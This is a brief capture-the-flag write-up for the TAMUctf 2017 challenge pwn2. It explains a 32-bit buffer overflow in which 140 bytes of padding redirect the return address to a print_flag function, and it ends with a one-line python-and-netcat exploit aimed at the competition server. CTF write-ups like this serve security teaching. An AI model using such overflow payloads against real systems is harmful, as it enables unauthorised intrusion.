TAMUctf 2017 : pwn100-pwn2

nc pwn.ctf.tamu.edu 4321
The flag printing functionality has been deprecated.

Solution

So.. another 32bit binary vulnerable to buffer overflow

..w/ 140 bytes of junk we can overwrite the return pointer.

but.. return to where?

and.. in this case, we can directly execute the function print_flag()

ez pz lemon sqz :)

Final remote exploit

python -c 'print "A"*140 + "\x4b\x85\x04\x08"*1 ' | nc pwn.ctf.tamu.edu 4321  
comments powered by Disqus

Bitcoin Donate 3C1wt7a83sHf2AnutNZF22nXPZubGKdi2m